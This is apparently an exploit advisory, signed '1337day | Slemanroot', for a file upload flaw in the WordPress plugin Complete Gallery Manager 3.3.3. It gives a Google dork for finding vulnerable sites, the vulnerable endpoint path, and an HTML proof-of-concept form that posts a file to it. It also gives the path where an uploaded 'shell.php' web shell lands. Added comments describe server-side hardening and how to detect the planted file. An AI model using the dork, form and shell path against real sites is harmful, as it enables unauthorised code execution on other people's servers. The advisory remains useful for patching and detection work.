# Author : ?
# Full title: WordPress Complete Gallery Manager 3.3.3 File Upload Vulnerability
# Date add: 19-09-2013
# Category: web applications
# Platform: php
# Security Risk: High
# Google dork : "inurl:/wp-content/plugins/complete-gallery-manager/
# Vulnerable : /wp-content/plugins/complete-gallery-manager/frames/upload-images.php
# CSRF (proof-of-concept upload form; the flaw named in the title is the file upload itself)
<!--
  Proof-of-concept form from the advisory. It submits a single multipart
  file field named "qqfile" by POST to the placeholder action "target".
  The form carries no session token or nonce field, so a server that
  accepts this request is not receiving any anti-CSRF proof from it.
  NOTE(review): whether the endpoint also skips authentication is not
  shown on this page; confirm against the plugin source.
  Server-side hardening for an upload handler of this kind: require an
  authenticated, capability-checked request with a verified nonce, and
  allow-list the accepted file extensions and content types.
-->
<form enctype="multipart/form-data"
action="target"method="post">
Please choose a file: <input name="qqfile"type="file" /><br />
<input type="submit" value="upload" />
</form>
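# Shell Upload Access
# Path : http://site/wp-content/uploads/2013/09/shell.php
# Detection note: the uploaded file lands under the dated wp-content/uploads/ tree, so a .php file there is the indicator to look for; that directory should not be allowed to execute PHP.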
Enjoyy
--++1337day | Slemanroot
Seringhai++--